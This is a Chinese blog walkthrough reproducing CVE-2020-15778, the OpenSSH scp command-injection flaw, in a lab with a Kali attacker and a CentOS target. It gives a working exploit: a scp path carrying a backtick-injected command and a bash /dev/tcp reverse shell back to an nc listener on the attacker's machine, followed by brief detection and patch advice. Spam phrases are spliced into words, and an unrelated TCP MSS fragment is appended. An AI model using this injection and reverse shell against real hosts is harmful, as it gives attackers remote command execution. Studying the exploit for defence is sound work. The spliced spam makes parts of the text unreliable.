今天就跟大家聊聊有关CVE-2020-15778漏洞复现是怎样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。(1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数l免费云主机域名inux系统受影响。(2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命令把一个kali系统的文件传输给Linux系统。(3)漏洞类型:命令执行(4)漏洞影响版本:OpenSSH
虚拟机安装CentOS和kali靶机环境:CentOS6,ip:192.168.5.138渗透机环境:Kali 2020,ip:192.168.5.130yum install -y iptables安装错误,接下来根据提示删除/var/cache/yum/i386/6/base/mirrorlist.txt文件rm /var/cache/yum/i386/6/base/mirrorlist.txt没有找到文件,下面安装tree测试一下yum命令是否能够正常使用yum install -y tree还是报一样的错误,证明yum功能无法使用,上网查看yum无法使用解决办法。只需要在centos命令行界面下执行一下几条命令sed -i “s|enabled=1|enabled=0|g” /etc/yum/pluginconf.d/fastestmirror.confmv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backupcurl -o /etc/yum.repos.d/CentOS-Base.repo https://www.xmpan.com/Centos-6-Vault-Aliyun.repoyum clean allyum makecache执行完成之后再次尝试安装iptablesyum install -y iptablesyum install iptables-servicesiptables -F //清空默认规则service iptables start //启动iptables服务iptables -t filter -A INPUT -p tcp –dport 22 -m tos –tos 0x10 -j DROP //配置iptablesservice iptables save //保存iptables配置iptables -L -n –line-number //显示iptables的规则和相对应的编号echo “123456” >1.txt //输入123456到当前目录下的1.txt文件scp 1.txt root@192.168.5.138:/tmp/h.txt //拷贝1.txt文件到centos机的/tmp/h.txt文件中ssh@root192.168.5.138 //直接使用ssh连接centos机scp功能正常使用,ssh连接centos失败,证明iptables策略(禁用ssh登录,只保留scp)成功有效。前提:需要知道centos的ssh账号密码(1)查看CentOS的ssh版本ssh -v(2)首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。scp 1.txt root@192.168.5.138:’`touch /tmp/test.txt` /tmp’成功将kali上面的文件传入道centOS上面。(3)在kali机上监听5555端口nc -lvp 5555(4)进行反弹shellscp test.txt root@192.168.5.138:’`bash -i >& /dev/tcp/192.168.5.130/5555 0>&1`/tmp/test1.txt’(5)在kali机的监听界面执行任意系统命令,比如使用ifconfig可以查到centos机的ip。有人可能觉得已经拿到ssh的用户名和密码了,直接ssh进去不就好了,回想过程,环境配置中禁用了ssh登录,只保留scp。不能直接使用ssh连接,我们是通过scp调用ssh,完成连接。该漏洞复现简单,漏洞危害大,利用局限性很大,需要ssh的用户密码。如果我们找到目标用户的用户名和密码,而且目标用户关闭了ssh,但是开启scp,那我们就可以利用这种漏洞反弹shell获取权限。(1)检测方法输入ssh -v命令查看openssh版本如显示的版本号
(2)修复方案升级补丁。看完上述内容,你们对CVE-2020-15778漏洞复现是怎样的有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注云编程开发博客行业资讯频道,感谢大家的支持。
最大报文段长度(MSS)表示TCP传往另一端的最大数据的长度。当一个连接建立时,连接的双方都要通告各自的MSS。我们已经见过MSS都是1024。这导致IP数据报通常是40字节长:20字节的TCP首部和20字节的IP首部。在免费云主机域名有些书里,将它看作可“协…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。